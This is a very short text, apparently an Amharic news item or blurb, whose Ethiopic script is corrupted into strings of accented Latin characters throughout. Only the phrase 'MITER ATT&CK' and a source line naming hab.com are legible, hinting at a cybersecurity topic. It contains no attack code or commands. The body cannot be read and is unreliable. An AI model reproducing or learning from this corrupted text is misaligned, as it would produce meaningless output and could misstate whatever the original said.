áá áááť á áłáá á áĽááśá˝ á áá á¨ááľáłáá፠á áááááśá˝á á¨áá áá ááłá ááᢠáááááĽáŠ á¨áŠáľáŤ áľáá áśá˝á áŤááŁá ᨠáá, ááá áá á¨áŠá˛áŤ áŤááá á áááááśá˝á á áá áá áĽáá˛á ááááąá áĽááľ áľáá á áŤáľá°áá á. áá°áŤá°áá áááľáááľ á°á áááá˝ á ááŤáááˇá¸á áśááľááŽá˝ ááá áľá áĽááá áá˝ ááá á ááŁá¸áá˘
á¨áľááááľ áĽá ᨠMITER ATT&CK áŁá
áŞáá˝ áá áááá á áááŤážá˝ á áá áááá
ááá: hab.com